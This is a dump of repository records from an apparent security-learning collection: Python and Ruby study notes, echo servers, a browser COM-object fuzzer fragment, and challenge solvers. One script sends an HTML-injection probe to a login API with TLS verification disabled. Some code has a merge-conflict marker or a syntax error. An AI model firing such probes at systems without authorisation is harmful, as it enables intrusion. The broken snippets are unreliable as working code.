Explorer\\\\iexplore.exe',root+'html\\\\index.html', root+'log', '600', 'Fuzzing Media Player', clsid])\n\t\t#remove clsid from list in objects.js so we skip for next fuzzing iteration \n\t\t#revisit to blacklist ID - better solution\n\t\tf = open(\"conf/objects.js\",'r')\n\t\tfiledata = f.read()\n\t\tf.close()\n\t\tnewdata = filedata.replace(\",\\n'\"+clsid+\"'\",\"\")\n\t\tf = open(\"conf/objects.js\",'w')\n\t\tf.write(newdata)\n\t\tf.close()\n\nexecute()" }, { "alpha_fraction": 0.5946666598320007, "alphanum_fraction": 0.6026666760444641, "avg_line_length": 16.090909957885742, "blob_id": "94c57e7235392e477b15022f34a58597c916af43", "content_id": "e245bcd158d97ee03b4194399ef94226b43532e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/python/getmodules", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nDESC=\"DUMP MODULES\"\n\nimport immlib\n\ndef main(args):\n ins=immlib.Debugger()\n ins.ps()\n ins.run()\n psList=ins.ps()\n\n moduleList=ins.getAllModules()\n\n for process in psList:\n if process[1] == 'iexplore':\n ins.Attach(process[0])\n\n for element in moduleList\n ins.log(element[0])\n\n return \"[+] MODULES LOGGED\"" }, { "alpha_fraction": 0.6144994497299194, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 22.405405044555664, "blob_id": "c879265e59b171674f540ad0b5d5d3062123a7cb", "content_id": "04075b26e4c2be4d34c0d782aa214cc58dc00ceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 869, "license_type": "no_license", "max_line_length": 62, "num_lines": 37, "path": "/python/Module-3/multiechoserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport threading, socket, time\n\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\ntcpSocket.bind((\"0.0.0.0\", 8000))\ntcpSocket.listen(2)\nprint \"Waiting for a Client ..\"\n\n\ndef echo_server(id):\n (client, (ip, port)) = tcpSocket.accept()\n\n print \"rcvd connection from : \", ip\n print \"starting echo output ...\"\n time.sleep(2)\n data = 'dummy'\n\n while len(data):\n data = client.recv(2048)\n print threading.current_thread()\n print \"ID = %d \" %id\n print ip, \" sent: \", data\n client.send(data)\n\n client.close()\n\nthreads = list()\nfor i in range(2):\n thread = threading.Thread(target=echo_server, args=(i,))\n thread.start()\n time.sleep(2)\n threads.append(thread)\n\n\n\n" }, { "alpha_fraction": 0.6795580387115479, "alphanum_fraction": 0.6906077265739441, "avg_line_length": 11.133333206176758, "blob_id": "c8e6daa6da6dd4af5f2145bad648a762bc37cc16", "content_id": "37021dcdda039bc428ee87696f30b830703fb741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 181, "license_type": "no_license", "max_line_length": 36, "num_lines": 15, "path": "/ruby/psFund/varNilMethodsScope.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "res = nil\np res.nil?\n\ndef double(var)\n p var * 2\nend\n\n# access sys launch separate process\nputs \"backticks dd\"\nputs `date`\nputs %x(date)\nputs system \"date\"\n\ndouble(2)\ndouble(\"bye\")" }, { "alpha_fraction": 0.6481440663337708, "alphanum_fraction": 0.6531956791877747, "avg_line_length": 22.474225997924805, "blob_id": "37ca0eadc24cd985c45579cad98e3ad8a8e65ef8", "content_id": "c683549031e309467db7f155ea449c21e43ddcaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4553, "license_type": "no_license", "max_line_length": 113, "num_lines": 194, "path": "/ruby/psFund/blocksConstantsModules.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# BLOCKS\n#\n# [1,2,3].each do\n# puts \"stuff\"\n# end\n#\n# [1,2,3].each{|num|puts num}\n#\n# class Spaceship\n# def debug_only\n# return nil unless @debug\n# reuturn nil unless block_given?\n# puts \"running code...\"\n# yield @debug_attrs # if debug requires args pass to yeild\n# end\n# end\n#\n# ship.debug_only # does nothing\n# ship.debug_only do\n# puts \"This is debug output\"\n# end\n#\n# ship.debug_only do |attrs|\n# puts \"Debug attr values : #{attrs.inspect}\"\n# end\n\n# BLOCK LOCAL VARS\n#\n# $debug = true\n#\n# def debug_only\n# yield if $debug && block_given?\n# end\n#\n# class Spaceship\n# def initialize\n# @debug_attrs = {containment_status: :ok, core_temp: 350}\n# end\n#\n# def launch\n# debug_only {p @debug_attrs }\n# end\n#\n# end\n#\n# Spaceship.new.launch\n\n# executes start time, then exec block, then calc time taken to exec block\n\n# def with_timing\n# start = Time.now\n# if block_given?\n# yield\n# puts \"Time taken: #{Time.now - start} sec\"\n# end\n# end\n#\n# # code to operate\n#\n# def operation_1\n# sleep(1)\n# end\n#\n# def operation_2; end\n#\n# with_timing do\n# operation_1\n# operation_2\n# end\n\n# PROCS - can give block a name in param list - convert block into obj\n#\n# def debug_only(param = nil, &block)\n# puts \"Param class: #{param.class}\" #NilClass\n# puts \"Block class: #{block.class}\" if block_given? #Proc\n# end\n#\n# debug_only{}\n# puts \"---\"\n# p = Proc.new {|bla| puts \"I'm a proc that says #{bla}!\"}\n# p = proc {|blah| puts \"I'm a proc that says #{bla}!\"}\n#\n# #call\n# p.call \"woot!\"\n# p.yield \"wootwoot\"\n# p.(\"nowoot\")\n# p[\"wootz\"]\n#\n# debug_only(p)_\n# puts \"---\"\n# debug_only(&p)\n\n# LAMBDAS\n# convert block into obj converts block into proc\n\n# lmb = lambda {|bla| \"I'm also a proc, and I say #{bla}\"}\n# also_lmb = ->(blah){ \"I'm also a proc, and I say #{bla}\"}\n\n# Differences\n# Procs behave like Blocks - allow you to drop code into a method, but with more flexibility bc they are named\n# can be passed around like reg obj\n\n# lambdas are like anyonymous methods, are strict about args\n# diff in arg handling - lambdas - too many or too few args cause an exception, Procs - extra args discarded\n# missing args set to nil\n# diff in return and break handling - procs - return is executed in the scope where block was def\n# procs - break isn't allowed outside a loop -- shouldn't use return or break in procs - should try to avoid\n# return in blocks too\n# lambdas - break and return both return control to the calling method\n\n# check args expected\n# proc {|a, b|}.arity\n# # if arg is optional returns non optional args + 1 & then converts to -\n# proc {|a, *b, c|}.arity\n#\n# # symbol to proc conversion\n# def debug_only(param = nil, &block)\n# puts \"Param class: #{param.class}\"\n# puts \"Block class: #{block.class}\" if block_given?\n# end\n\n# debug_only(p) # param == p\n# debug_only(&p) # param == nil, block == p tells ruby to treat as block & tries to coerce obj into proc\n#\n# names = [\"jabby\",\"doot\",\"lokiri\"]\n# up_name = names.map{|name|name.upcase}\n#\n# # instead of passing block we can give it a symbol and tell it to treat as block - if not proc will cal to_proc\n# up_name = names.map(&:upcase) # with & will coerce\n\n# CONSTANTS\n#\n# MAX_SPEED = 1000\n# # can modify constants\n# # with freeze cannot - runtime error thrown\n# TYPES = []\n# TYPES.freeze\n# TYPES << \"yo\"\n# # can't unfreeze, but can check to see if frozen\n# TYPES.frozen?\n#\n# # CONST within class can't be accessed outside without class and double colon, can't def const inside meth\n# class A; MIN_SPEED = 0; end\n# MIN_SPEED\n# A::MIN_SPEED\n# # can add another CONST to class the same way\n# A::MAX_SPEED = 100\n#\n# # MODULES\n# # all ApI related meth can go into api module\n# module API\n# def self.hatch_list # methods need to be added as module lvl methods - by prefixing with self\n# # ...\n# end\n# end\n#\n# hatches = API.hatch_list\n#\n# module SpaceStuff\n# class Spaceship\n# end\n# end\n#\n# ship = SpaceStuff::Spaceship.new # if classes can be accessed like any other CONST with scope operator\n\n# MIXIN\n# alt to multiple inheritance\n# instance methods become available as instance meth of the class\n\n# module AirControl\n# def measure_oxygen\n# #...\n# end\n# end\n#\n# class Spaceship\n# include AirControl\n# end\n#\n# ship = Spaceship.new\n# ship.measure_oxygen\n\n# instance methods in module become available as class methods\n# module Docking\n# def get_docking_params\n# #..\n# end\n# end\n#\n# class Spaceship\n# extend Docking\n# end\n#\n# Spaceship.get_docking_params" }, { "alpha_fraction": 0.5912806391716003, "alphanum_fraction": 0.6471389532089233, "avg_line_length": 21.96875, "blob_id": "60890406b31f59fb8af736861304a904eb48c161", "content_id": "3af0069043e34ff39dcbc73c5b43bf6f61e2950e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 734, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/ruby/request.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n# send a POST/data to an ip address/port\nrequire 'socket'\nrequire 'uri'\nrequire 'net/http'\nrequire 'openssl'\n#\n# buf = ''\n# num = rand(25-100) + 25\n# index = rand(num)\n#\n# num.times do\n# alpha = rand(127-7) + 7\n# buf += alpha.chr\n# end\n#\n# buffer = \"GET /api/v1/auth/login\" + buf\n# puts buffer\n#\n# s = UDPSocket.new\n# s.send(buffer,0,\"10.218.207.183\",80)\n\nuri = URI.parse(\"https://10.218.207.183\")\nhttp = Net::HTTP.new(uri.host, uri.port)\nhttp.use_ssl = true\nhttp.verify_mode = OpenSSL::SSL::VERIFY_NONE\nrequest = Net::HTTP::Post.new(\"/api/v1/auth/login\")\nrequest.body = {'credentials' => {'username' => '\"><h1>hi</h1>', 'password' => 'key'}}\nresponse = http.request(request)\n\nputs response.code\nputs response.body" }, { "alpha_fraction": 0.502196192741394, "alphanum_fraction": 0.5204977989196777, "avg_line_length": 31.267717361450195, "blob_id": "d837fdbe833b29acd0e570bba7e30a6f8857ca7d", "content_id": "81c7a110a4e6c59e6ee548ba23168cc13d0a58c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4098, "license_type": "no_license", "max_line_length": 108, "num_lines": 127, "path": "/ruby/xrxxoxtxxa.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "require 'rest-client'\nrequire 'pp'\nrequire 'json'\n\n# Board Layout\n# [1][2][3]\n# [4][5][6]\n# [7][8][9]\n# - empty space\n# c computer piece\n# p player piece\n\nclass RxoxtxxaxAPI\n\n def initialize\n @base_url = 'https://rota.pxrxxaetxoxrxixxxan.com/rota/service/play.php'\n res = RestClient.get(\"#{@base_url}?request=new\")\n @cookies = res.cookies\n end\n\n def place(x)\n JSON.parse(RestClient.get(\"#{@base_url}?request=place&location=#{x}\", :cookies => @cookies))\n end\n\n def move(x, y)\n res = JSON.parse(RestClient.get(\"#{@base_url}?request=move&from=#{x}&to=#{y}\", :cookies => @cookies))\n end\n\n def status\n JSON.parse(RestClient.get(\"#{@base_url}?request=status\", :cookies => @cookies))\n end\n\n def reset\n res = RestClient.get(\"#{@base_url}?request=new\")\n @cookies = res.cookies\n JSON.parse(res)\n end\n\nend\n\n\npp @game = RxxoxtxaAPI.new\n\n# ideally would write code to check board \"---------\" to make sure player goes first\n# but ctrl-c up arrow Enter is our friend here 0_0\n\ndef gameloop()\n\n @game.reset\n\n # opening moves aren't correct or adjusted...just restart until AI chooses OUR ideal start\n # loop not running with a poor start - always reading success ..debug this later maybe\n\n @game.status[\"status\"] == \"success\" ? (pp @game.place(1)) : gameloop()\n @game.status[\"status\"] == \"success\" ? (pp @game.place(3)) : gameloop()\n @game.status[\"status\"] == \"success\" ? (pp @game.place(8)) : gameloop()\n\n # Algorithm? Shmalgorithm\n # roughly 5sec timeout - case is fast enough\n until @game.status[\"data\"].has_key?(\"hash\") do\n case @game.status[\"data\"][\"board\"]\n when \"p-p-c-cpc\",\"pcp---cpc\",\"pcp-c-cp-\",\"pcp-pcc--\",\"pcp--ccp-\",\"pcp-cc--p\",\"p-p-ccc-p\",\"p-p-cccp-\"\n pp @game.move(1,4)\n when \"pcpcc--p-\",\"pcpc---pc\",\"pcp-c--pc\",\"p-pcc--pc\",\"pcpcc-p--\",\"p-pcc-p-c\"\n pp @game.move(3,6)\n when \"p--ccp-pc\",\"p-cc-p-pc\",\"pc-cc--p-\",\"pc-ccp-p-\",\"p-cccp-p-\"\n pp @game.move(8,7)\n when \"pcpc-c-p-\"\n pp @game.move(8,5)\n when \"pcpcp---c\",\"c-pppcc--\"\n pp @game.move(5,8)\n when \"p-cc-ppc-\",\"p-cccpp--\",\"p-c-cppc-\"\n pp @game.move(1,2)\n when \"c-pp--cpc\",\"c-pp-cc-p\",\"-cpp-c-cp\",\"cp-p-c-cp\"\n pp @game.move(4,5)\n when \"pc--cp-pc\",\"pc---pcpc\",\"-c-pcpcp-\",\"---pcpcpc\"\n pp @game.move(6,3)\n when \"pc-c-pp-c\",\"p-c-cpp-c\",\"p--ccpp-c\",\"pcp-c-p-c\"\n pp @game.move(7,8)\n when \"-cppcc-p-\",\"--ppcccp-\",\"c-ppcc-p-\",\"c-ppcc-p-\",\"c-pp-ccp-\"\n pp @game.move(8,9)\n when \"-cppc--pc\",\"-cpp--cpc\",\"-cpp-cc-p\",\"-cppc-cp-\",\"-c-pcp-pc\"\n pp @game.move(4,1)\n when \"pc-c-ppc-\",\"pc-c-p-pc\",\"p-c--pcpc\"\n pp @game.move(1,5)\n when \"--ccpp-pc\",\"-cp-p-cpc\"\n pp @game.move(5,1)\n when \"-cpp-ccp-\"\n pp @game.move(3,5)\n when \"p-cc-pp-c\"\n pp @game.move(6,5),\"p-p-ccc-p\"\n when \"pc-cp-p-c\",\"c--ppccp-\",\"-c-pp-cpc\",\"c--ppcc-p\"\n pp @game.move(5,3)\n when \"pcp-c-c-p\",\"--ppccc-p\",\"-cppc-c-p\"\n pp @game.move(9,8)\n when \"-c--ppcpc\",\"-cp-pcc-p\",\"c-p-pc-cp\",\"cp--pc-cp\"\n pp @game.move(5,4)\n when \"p-ccp-pc-\"\n pp @game.move(5,6)\n when \"-pcc-ppc-\",\"cpc---pcp\",\"cpc--pp-c\"\n pp @game.move(7,5)\n when \"cpc-pp-c-\",\"-pccpp--c\",\"cpc-p--cp\"\n pp @game.move(5,7)\n when \"c-pp-c-cp\",\"c-ppcc--p\",\"c-ppc--cp\",\"c-ppc-c-p\"\n pp @game.move(3,2)\n when \"cp--cppc-\",\"-pc-cppc-\",\"cpc--ppc-\"\n pp @game.move(6,9)\n when \"--ccpppc-\"\n pp @game.move(5,2)\n when \"-pcc-pp-c\",\"-p-ccppc-\",\"-p-ccpp-c\",\"-pcccpp--\"\n pp @game.move(2,1)\n when \"cp-p-cc-p\",\"cp-pcc--p\",\"-p-pcc-cp\"\n pp @game.move(2,3)\n when \"cpc-c-p-p\",\"-pcc--pcp\",\"-pc-c-pcp\"\n pp @game.move(9,6)\n when \"cp---cpcp\",\"cp--c-pcp\"\n pp @game.move(7,4)\n when \"cpcp---cp\",\"cp-pc--cp\"\n pp @game.move(4,7)\n when \"cpcp--c-p\"\n pp @game.move(2,5)\n end\n end\n pp @game.status[\"data\"][\"hash\"]\nend\n\ngameloop()\n" }, { "alpha_fraction": 0.6178861856460571, "alphanum_fraction": 0.6536585092544556, "avg_line_length": 24.58333396911621, "blob_id": "56efa8a6a3e9a8187606d01cad64fce555806207", "content_id": "9ae48ebb356f99a403b23aaa0ed9a52944e1e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 117, "num_lines": 24, "path": "/python/mastermind.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "import requests, json\n\nemail = '[email protected]'\n\nr = requests.post('https://mastermind.praetorian.com/api-auth-token/', data={'email':email})\nr.json()\n\n# > {'Auth-Token': 'AUTH_TOKEN'}\nheaders = r.json()\nprint headers\n\n# Interacting with the game\nr = requests.get('https://mastermind.praetorian.com/level/1/', headers=headers)\nr.json()\n\n\n# pseudo\nwpns = [1,2,3,4,5,6]\nguess = [1,2,3,4]\n\n# > {'numGladiators': 4, 'numGuesses': 8, 'numRounds': 1, 'numWeapons': 6}\nr = requests.post('http://mastermind.praetorian.com/level/1/', data=json.dumps({'guess':[6,5,1,3]}), headers=headers)\nprint r.json()\n# > {'response': [2, 1]}\n\n" }, { "alpha_fraction": 0.6397219896316528, "alphanum_fraction": 0.6554498672485352, "avg_line_length": 19.704545974731445, "blob_id": "b0e1bf2133368d4b76d7eeef09a0c86f17667fa3", "content_id": "8a10bf5315d1bc6d1a51e393bae02889402b2f0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 105, "num_lines": 132, "path": "/ruby/unixProcesses.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# # PROCESS ID - getpid(2)\n# puts Process.pid\n# # parent\n# puts Process.ppid\n#\n# # ENV var\n# ENV['MSG'] = 'wing it'\n# system \"echo $MSG\"\n\n# ARGUMENTS\n# many lib for args like optparse\n# if don't want to deal with overhead do something like\n# ARGV.include?('--help')\n\n# NAMING PROCESSES\n# rename current process\n# $PROGRAM_NAME = \"myproc\"\n\n# EXIT\n# Kernel#exit - exit - status code 0\n# at_exit {puts 'exiting'}\n# exit\n\n# Kernel#exit! - exit! - status code 1\n# at_exit line never invoked\n\n# Kernel#abort - generic unsuccessful exit - status code 1\n# at_exit {puts \"exited\"}\n# abort \"Something went wrong\"\n\n# FORK\n\n#CoW - copy on write\n# delays copying of memory until needs to be written\n\n# arr = [1,2,3]\n# fork do\n# # child initialized\n# # if using CoW this proc doesn't need to copy arr var\n# # bc we don't modify arr it shares memory with parent\n# p arr\n# end\n#\n# fork do\n# # arr var hasn't been copied bc of CoW\n# arr << 4\n# # modifies array, so copy needs to be made for this proc\n# # b4 it can be modified - array in parent remains un changed\n# end\n\n# fork do\n# 5.times do\n# sleep 1\n# puts \"I am an orphan\"\n# end\n# end\n#\n# Process.wait\n# abort \"Parent died\"\n\n# ceate 2 child proc\n# 2.times do\n# fork do\n# # rand sleep for each child\n# sleep rand(5)\n# end\n# end\n#\n# 2.times do\n# # wait for child proc to exit & print pid that gets returned\n# puts Process.wait\n# end\n\n# Process.wait2\n## can set exit code\n\n# 2.times do\n# fork do\n# if rand(5).even?\n# exit 110\n# else\n# exit 112\n# end\n# end\n# end\n#\n# 2.times do\n# # wait for each of child procs to exit\n# pid, status = Process.wait2\n#\n# # if proc exited with 110 we know even\n# if status.exitstatus == 110\n# puts \"#{pid} even #\"\n# else\n# puts \"#{pid} odd #\"\n# end\n# end\n\n# waitpid & waitpid2 wait for a specific child to exit determined by pid\n# fav = fork do\n# exit 77\n# end\n#\n# middle_child = fork do\n# abort \"wait!\"\n# end\n#\n# pid, status = Process.waitpid2 fav\n# puts status.exitstatus\n\n# Babysitting\n# parent forks childens then monitors them to ensure they are responsive\n\n# RACE CONDITIONS\n# create 2 childens - even if parent is slow at processing exited child it can always get exit child info\n# 2.times do\n# fork do\n# # both procs exit immed\n# abort \"finished\"\n# end\n# end\n#\n# # parent proc waits for the 1st proc then sleeps for 5 sec\n# # meanwhile 2nd child proc has exited and is no longer running\n# puts Process.wait\n# sleep 5\n#\n# # parent prc asks to wait once again, & 2nd proc's exit info\n# # has been queued up amazingly & is returned here\n# puts Process.wait\n#\n# # calling Process.wait when no child procs will raise Errno::ECHILD, KEEP TRACK of CHildens\n\n" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.6992753744125366, "avg_line_length": 20.19230842590332, "blob_id": "261baa68b935386504496e05ffe1b1e969a66650", "content_id": "6e7381b534572ca89112c84076eb715b8e708d43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 62, "num_lines": 26, "path": "/python/Module-3/server.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport socket\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n\ntcpSocket.bind((\"0.0.0.0\",8000))\ntcpSocket.listen(2)\n\nprint \"Waiting for a Client ..\"\n(client, (ip, port)) = tcpSocket.accept()\n\nprint \"rcvd connection from : \", ip\nprint \"starting echo output ...\"\n\ndata = 'dummy'\n\nwhile len(data) :\n data = client.recv(2048)\n print \"Client sent: \",data\n client.send(data)\n\nprint \"closing connection ...\"\nclient.close()\n\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "420e0b74e2ba350e90135f7a59723e6dea6b7c5b", "content_id": "2651447cb36becc1575251e05d4187ebcd478507", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/python/Module-2/signals.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n" }, { "alpha_fraction": 0.6520681381225586, "alphanum_fraction": 0.6569343209266663, "avg_line_length": 13.714285850524902, "blob_id": "2f6963b86a7b6af70667c40e9ae12c9207f38671", "content_id": "51f632d332b87bbd88ebc79fc6b990e4d2ab56db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/python/Module-2/files.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n# write file\nfdesc = open(\"file.txt\", \"w\")\nfdesc.write(\"blah\")\n\n# append file\nfdesc = open(\"file.txt\", \"a\")\nfdesc.write(\"extra\")\n\n# close file\nfdesc.close()\n\n# read file\nfdesc = open(\"file.txt\", \"r\")\n\n# readlines\nfor line in fdesc.readlines():\n print(line.strip())\n\nimport os\nos.rename()\nos.delete()\n\n# EXERCISE\n# read /var/log/messages\n\n# find logs pertaining to USB & print them out" }, { "alpha_fraction": 0.689338207244873, "alphanum_fraction": 0.7022058963775635, "avg_line_length": 27.63157844543457, "blob_id": "00c6bdf6604796e9f7a7b5c5d285d9131c106057", "content_id": "1f4f835e41f886066077b8a518bc9a834331bef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 90, "num_lines": 19, "path": "/python/Module-3/simplehttpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\n\nimport SocketServer, SimpleHTTPServer\n\n\nclass HttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n # overwrite GET request\n def do_GET(self):\n if self.path == '/admin':\n self.wfile.write('This page is only for Admins!\\n')\n self.wfile.write(self.headers)\n else:\n SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\n\nhttpServer = SocketServer.TCPServer(('',10001), SimpleHTTPServer.SimpleHTTPRequestHandler)\nhttpServer.serve_forever()\n" }, { "alpha_fraction": 0.5254378914833069, "alphanum_fraction": 0.5396163463592529, "avg_line_length": 28.2439022064209, "blob_id": "8bac6eb9df70ca2c3a7b0ac991cb4d7e5f6a3e36", "content_id": "6b060a76ac19be2d86464353b934e0f2557bd14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 94, "num_lines": 41, "path": "/ruby/ifconfig.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\n# an easier to view interface display \nrequire 'paint'\n\n# iterate through interfaces\n\ndef findInterfaces()\n if ARGV[0] == \"-v\"\n puts `ifconfig #{ARGV[1]} #{ARGV[2]}`\n else\n seq = 0..9\n en_container = []\n vmnet_container = []\n\n for num in seq\n en = `ifconfig en#{num} 2>/dev/null|grep -Po '(inet\\\\s|status:\\\\s)\\\\K[^\\\\s]*'`\n vmnet = `ifconfig vmnet#{num} 2>/dev/null|grep -Po '(inet\\\\s|status:\\\\s)\\\\K[^\\\\s]*'`\n str = en.split(\" \")\n status = str.pop\n ip = str.join(\"\\n\")\n newstatus = str.join(\" \")\n\n if en.size > 0 && status == \"active\"\n en_container << Paint[\"en#{num} - #{status}\", :green]\n en_container << Paint[\"#{ip}\", :white]\n elsif en.size > 0 && status == \"inactive\"\n en_container << Paint[\"en#{num} - #{status}\", \"#404040\"]\n en_container << ip if ip.size > 0\n end\n if vmnet.size > 0\n vmnet_container << Paint[\"vmnet#{num}\", :red]\n vmnet_container << Paint[\"#{vmnet.strip}\", :white]\n end\n end\n en_container.each{|interface|puts interface}\n vmnet_container.each{|interface| puts interface}\n end\nend\n\nfindInterfaces()\n" }, { "alpha_fraction": 0.5986193418502808, "alphanum_fraction": 0.6163707971572876, "avg_line_length": 20.125, "blob_id": "2cab8f94688b0b65b4bdcbd4332771139c182cc4", "content_id": "f47f7f92fc93780856f2a0d2c1d21b5054b0a5cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 62, "num_lines": 48, "path": "/python/Module-3/multiprocessechoserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport os, socket, time\n\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\ntcpSocket.bind((\"0.0.0.0\", 8000))\ntcpSocket.listen(2)\nprint \"Waiting for a Client ..\"\n\n\ndef echo_server():\n (client, (ip, port)) = tcpSocket.accept()\n\n childpid = os.fork()\n if childpid == 0:\n child_process()\n\n print \"rcvd connection from : \", ip\n print \"starting echo output ...\"\n time.sleep(2)\n data = 'dummy'\n\n while len(data):\n data = client.recv(2048)\n print \"pid is \", os.getpid()\n print ip, \" sent: \", data\n client.send(data)\n\n client.close()\n\n\ndef child_process():\n print(\"I am the child & my pid is: %d\" % os.getpid())\n echo_server()\n print(\"child is exiting\")\n\n\ndef parent_process():\n print(\"I am the parent & my pid is: %d\" % os.getpid())\n echo_server()\n print(\"parent is exiting\")\n\n\nparent_process()\n" }, { "alpha_fraction": 0.6187683343887329, "alphanum_fraction": 0.6302541494369507, "avg_line_length": 21.4780216217041, "blob_id": "885cb2728fbcafbb2b794bc548af4b6fcc3c420d", "content_id": "57662865e88fd6cc8b9702b2c9e86381a375762f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4092, "license_type": "no_license", "max_line_length": 109, "num_lines": 182, "path": "/ruby/psFund/methods.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# DEFAULT PARAMS\n# can include method calls or more logic\ndef produce_spaceship(type = :freighter, size = :xl)\n # ..\nend\n\ndef produce_spaceship(type = :freighter,\n size = calc_default_size(type))\n # ..\nend\n\ndef produce_spaceship(type = :freighter,\n size = (type == :freighter ? :xl : :m))\n # ..\nend\n=======\n# # VARIABLE LENGTH PARAM LISTS\n#\n# def produce_fleet(days_to_complete, *types)\n# #...\n# end\n#\n# produce_fleet(10,:freighter,:freighter,:explorer)\n# # could also call method with splat like this\n# ship_types = [:freighter,:freighter,:explorer]\n# produce_fleet(15,*ship_types)\n#\n# # KEYWORD ARGUMENTS\n#\n# produce_fleet(:freighter, :m, 100, 4)\n# produce_fleet(type: :freighter, size: :m,\n# fuel_tank_vol: 100,engine_cnt: 4)\n#\n# def produce_fleet(type: :freighter, size: :xl,\n# fuel_tank_vol: 400,engine_cnt: 4)\n# #...\n# end\n#\n# # can also be combined with reg param, as long as reg param comes first\n# def produce_fleet(type = :freighter, size: :xl)\n# #..\n# end\n#\n# def produce_spaceship(type = :freighter, size: m, **custom_components)\n#\n# components = {engine: :standard,\n# seats: :standard,\n# subwoofer: :none}\n#\n# components.merge!(custom_components)\n# #...\n# end\n#\n# produce_spaceship(:yacht, size: :s, engine: :rolls_royce, seats: :leather) # can replace custom components\n#\n# # METHOD ALIASING\n# # overriding the method but want to access old version\n# # if using super class can call super but if monkey patching need aliasing\n#\n# class String\n# def space_out\n# chars.join(\" \")\n# end\n#\n# # we want to change the string class by adding space out, but want to then add a modification to the size\n# # method to account for this change\n# # overrides method while retaining access to the original version\n# alias_method \"original_size\",\"size\"\n#\n# def size\n# original_size * 2 - 1\n# end\n# end\n#\n# puts \"abc\".spae_out\n# puts \"abc\".size\n\n# OPERATORS\n\nclass Spaceship\n attr_reader :name\n attr_reader :speed\n\n def initialize(name)\n @name = name\n @cargo = []\n @speed = 0\n @vessels = Hash.new { [] }\n end\n\n # passes type to vessels hash and returns wtv is stored at that key(type)\n def [](type)\n @vessels[type]\n end\n\n # get & set diff types of vessels stored in the space ship\n # returns a value that can appear on left side of assignment\n # takes an index and a value to set as args\n#\n# def []=(type,vehicles)\n# @vessels[type] = vehicles\n# end\n#\n# # allows me to put cargo onboard easily\n# def <<(cargo)\n# @cargo << cargo\n# end\n#\n# # spaceship operator compares 2 obj - rtn 0 if eq -1 if 1 < 2 and 1 if 1 > 2\n# def <=>(other)\n# name <=> other.name\n# end\n#\n# # unary + - used to inc dec ship's speed\n# def +@\n# @speed += 10\n# end\n#\n# def -@\n# @speed -= 10\n# end\n#\n# def !\n# puts \"self destruct sequence initiated\"\n# end\n#\n# end\n#\n# ship1 = Spaceship.new(\"shipper\")\n# ship2 = Spaceship.new(\"shippy\")\n# ship3 = Spaceship.new(\"shippyiest\")\n#\n# class Lander; end\n# ship1[:landers] = [Lander.new,Lander.new]\n# puts \"landers: 